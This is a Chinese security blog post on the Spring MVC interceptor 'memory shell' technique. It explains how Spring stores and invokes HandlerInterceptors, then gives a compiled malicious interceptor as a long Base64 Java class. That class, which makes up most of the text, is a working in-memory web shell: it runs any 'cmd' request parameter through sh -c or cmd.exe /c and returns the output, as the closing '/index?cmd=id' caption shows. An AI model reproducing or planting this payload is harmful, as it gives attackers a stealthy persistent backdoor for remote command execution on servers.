Spring Interceptor 内存马
2024年10月22日大约 1 分钟
Spring Interceptor 内存马
这里的描述的 Intercepor 是指 Spring 中的拦截器,它是 Spring 使用 AOP 对 Filter 思想的令一种实现,在其他框架如 Struts2 中也有拦截器思想的相关实现。不过这里将仅仅使用 Spring 中的拦截器进行研究。Intercepor 主要是针对 Controller 进行拦截。
关于 Interceptor 的调用与存储, 过程大致如下:
- Spring MVC 使用 DispatcherServlet 的
doDispatch方法进入自己的处理逻辑; - 通过
getHandler方法,循环遍历handlerMappings属性,匹配获取本次请求的 HandlerMapping; - 通过 HandlerMapping 的
getHandler方法,遍历this.adaptedInterceptors中的所有 HandlerInterceptor 类实例,加入到 HandlerExecutionChain 的 interceptorList 中; - 调用 HandlerExecutionChain 的 applyPreHandle 方法,遍历其中的 HandlerInterceptor 实例并调用其 preHandle 方法执行拦截器逻辑。
从上述流程可以看到拦截器本身需要是 HandlerInterceptor 实例,储存在 AbstractHandlerMapping 的 adaptedInterceptors 中。
动态注册 Interceptor
顺便看下 su18 师傅注入的类:
编译部署看下效果:
/addInterceptor:
/index:
注册恶意 Interceptor
编写恶意 Interceptor:
编译出 class, 转换成 Base64 字符串
yv66vgAAADQApgoAAgADBwAEDAAFAAYBABBqYXZhL2xhbmcvT2JqZWN0AQAGPGluaXQ+AQADKClWCAAIAQAYdGV4dC9odG1sOyBjaGFyc2V0PVVURi04CwAKAAsHAAwMAA0ADgEAJmphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlAQAOc2V0Q29udGVudFR5cGUBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYIABABAAVVVEYtOAsACgASDAATAA4BABRzZXRDaGFyYWN0ZXJFbmNvZGluZwsACgAVDAAWABcBAAlnZXRXcml0ZXIBABcoKUxqYXZhL2lvL1ByaW50V3JpdGVyOwgAGQEAIUhlcmUgaXMgU3VtbWVySW50ZXJjZXB0b3JDTUR+PGJyPgoAGwAcBwAdDAAeAA4BABNqYXZhL2lvL1ByaW50V3JpdGVyAQAHcHJpbnRsbggAIAEAA2NtZAsAIgAjBwAkDAAlACYBACVqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0AQAMZ2V0UGFyYW1ldGVyAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsHACgBABhqYXZhL2xhbmcvUHJvY2Vzc0J1aWxkZXIHACoBABBqYXZhL2xhbmcvU3RyaW5nCAAsAQAGd2hvYW1pCgAnAC4MAAUALwEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYKACcAMQwAMgAzAQAFc3RhcnQBABUoKUxqYXZhL2xhbmcvUHJvY2VzczsKADUANgcANwwAOAA5AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07BwA7AQARamF2YS91dGlsL1NjYW5uZXIKADoAPQwABQA+AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWCABAAQACXGEKADoAQgwAQwBEAQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7CgA6AEYMAEcASAEAB2hhc05leHQBAAMoKVoKADoASgwASwBMAQAEbmV4dAEAFCgpTGphdmEvbGFuZy9TdHJpbmc7CABOAQAACABQAQABXAoAKQBSDABTAFQBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgoAOgBWDABXAAYBAAVjbG9zZQcAWQEAE2phdmEvbGFuZy9UaHJvd2FibGUKAFgAWwwAXABdAQANYWRkU3VwcHJlc3NlZAEAGChMamF2YS9sYW5nL1Rocm93YWJsZTspVggAXwEAAnNoCABhAQACLWMIAGMBAAdjbWQuZXhlCABlAQACL2MKAGcAaAcAaQwAagBrAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7CgBnAG0MAG4AbwEABGV4ZWMBACgoW0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7CgAbAHEMAHIABgEABWZsdXNoCgAbAFYHAHUBABNqYXZhL2xhbmcvRXhjZXB0aW9uCgB0AHcMAHgABgEAD3ByaW50U3RhY2tUcmFjZQcAegEAL2NvbS9zdW1tZXJ5MjMzL2ludGVyY2VwdG9yL1N1bW1lckludGVyY2VwdG9yQ01EBwB8AQAyb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9IYW5kbGVySW50ZXJjZXB0b3IBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAMUxjb20vc3VtbWVyeTIzMy9pbnRlcmNlcHRvci9TdW1tZXJJbnRlcmNlcHRvckNNRDsBAAlwcmVIYW5kbGUBAGQoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7TGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlO0xqYXZhL2xhbmcvT2JqZWN0OylaAQAIb3V0cHV0T1MBABJMamF2YS9sYW5nL1N0cmluZzsBAAlzY2FubmVyT1MBABNMamF2YS91dGlsL1NjYW5uZXI7AQAOcmVzcG9uc2VXcml0ZXIBABVMamF2YS9pby9QcmludFdyaXRlcjsBAAZvdXRwdXQBAAFzAQAHaXNMaW51eAEAAVoBABBwcm9jZXNzQnVpbGRlck9TAQAaTGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcjsBAAlwcm9jZXNzT1MBABNMamF2YS9sYW5nL1Byb2Nlc3M7AQAEaW5PUwEAFUxqYXZhL2lvL0lucHV0U3RyZWFtOwEABGNtZHMBABNbTGphdmEvbGFuZy9TdHJpbmc7AQACaW4BAAR2YXI1AQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQAHcmVxdWVzdAEAJ0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0OwEACHJlc3BvbnNlAQAoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlOwEAB2hhbmRsZXIBABJMamF2YS9sYW5nL09iamVjdDsBAA1TdGFja01hcFRhYmxlBwChAQATamF2YS9pby9JbnB1dFN0cmVhbQcAlQEACkV4Y2VwdGlvbnMBAApTb3VyY2VGaWxlAQAZU3VtbWVySW50ZXJjZXB0b3JDTUQuamF2YQAhAHkAAgABAHsAAAACAAEABQAGAAEAfQAAADMAAQABAAAABSq3AAGxAAAAAgB+AAAACgACAAAADAAEAA0AfwAAAAwAAQAAAAUAgACBAAAAAQCCAIMAAgB9AAAEHgAGABAAAAF3LBIHuQAJAgAsEg+5ABECACy5ABQBABIYtgAaKxIfuQAhAgA6BBkExgFEBDYFuwAnWQS9AClZAxIrU7cALToGGQa2ADA6BxkHtgA0Ogi7ADpZGQi3ADwSP7YAQToJGQm2AEWZAAsZCbYASacABRJNOgoZChJPtgBRmQAGAzYFGQnGACYZCbYAVacAHjoKGQnGABQZCbYAVacADDoLGQoZC7YAWhkKvxUFmQAZBr0AKVkDEl5TWQQSYFNZBRkEU6cAFga9AClZAxJiU1kEEmRTWQUZBFM6CbgAZhkJtgBstgA0Ogq7ADpZGQq3ADwSP7YAQToLGQu2AEWZAAsZC7YASacABRJNOgwsuQAUAQA6DRkNGQy2ABoZDbYAcBkNxgAmGQ22AHOnAB46DhkNxgAUGQ22AHOnAAw6DxkOGQ+2AFoZDr8ZC8YAJhkLtgBVpwAeOgwZC8YAFBkLtgBVpwAMOg0ZDBkNtgBaGQy/pwAKOgQZBLYAdgSsAAcAXQB+AIsAWACSAJcAmgBYAQ8BGwEoAFgBLwE0ATcAWADzAUMBUABYAVcBXAFfAFgAAAFrAW4AdAADAH4AAAB+AB8AAAARAAgAEgAQABMAGwAVACUAFgAqABcALQAYAD8AGQBGABoATQAbAF0AHABxAB4AewAfAH4AIQCLABsApgAiAMEAIwDWACQA4wAlAPMAJgEHACcBDwAoARYAKQEbACoBKAAnAUMAKwFQACUBawAvAW4ALQFwAC4BdQAwAH8AAACsABEAcQANAIQAhQAKAF0ASQCGAIcACQEPADQAiACJAA0BBwA8AIoAhQAMAPMAeACLAIcACwAtAT4AjACNAAUAPwEsAI4AjwAGAEYBJQCQAJEABwBNAR4AkgCTAAgA1gCVAJQAlQAJAOMAiACWAJMACgAlAUYAIACFAAQBcAAFAJcAmAAEAAABdwCAAIEAAAAAAXcAmQCaAAEAAAF3AJsAnAACAAABdwCdAJ4AAwCfAAABJwAV/wBtAAoHAHkHACIHAAoHAAIHACkBBwAnBwA1BwCgBwA6AABBBwApDkwHAFj/AA4ACwcAeQcAIgcACgcAAgcAKQEHACcHADUHAKAHADoHAFgAAQcAWAj5AAIaUgcAov4ALgcAogcAoAcAOkEHACn/ACIADgcAeQcAIgcACgcAAgcAKQEHACcHADUHAKAHAKIHAKAHADoHACkHABsAAQcAWP8ADgAPBwB5BwAiBwAKBwACBwApAQcAJwcANQcAoAcAogcAoAcAOgcAKQcAGwcAWAABBwBYCPgAAkwHAFj/AA4ADQcAeQcAIgcACgcAAgcAKQEHACcHADUHAKAHAKIHAKAHADoHAFgAAQcAWAj/AAIABAcAeQcAIgcACgcAAgAAQgcAdAYAowAAAAQAAQB0AAEApAAAAAIApQ==替换对应注册代码后编译部署, 看下效果:
index:
/addInterceptor:
/index?cmd=id:
